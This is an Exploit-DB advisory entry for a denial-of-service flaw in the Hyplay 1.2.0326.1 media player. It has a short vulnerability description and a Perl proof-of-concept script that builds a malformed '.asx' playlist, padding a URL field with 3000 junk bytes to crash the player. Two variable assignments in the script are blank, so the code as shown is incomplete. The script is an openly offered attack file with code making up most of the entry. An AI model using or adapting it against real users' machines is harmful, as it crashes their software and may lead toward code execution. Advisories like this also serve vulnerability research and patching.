Hyplay 1.2.0326.1 - .asx Remote Denial of Service Vulnerability

ID EDB-ID:33973
Type exploitdb
Reporter Steve James
Modified 2010-05-10T00:00:00


Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability. Dos exploit for windows platform

                                            source: http://www.securityfocus.com/bid/40048/info

Hyplay is prone to a remote denial-of-service vulnerability.

Attackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

Hyplay 1.2.0326.1 is vulnerable; other versions may also be affected. 

#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca
#A bug exists in the way Hyplay processes malformed .asx play
#list files. This could potentially lead to code execution on
#the users machine.
my $data1=  
my $data2="http://";
my $data3= #asx file footer
my $junk = "\x41" x 3000;
open(my $playlist, "> hyplay_d0s.asx");
print $playlist $data1.$data2.$junk.$data3."\r\n";
close $playlist;
print "\nEvil asx file created successfully.";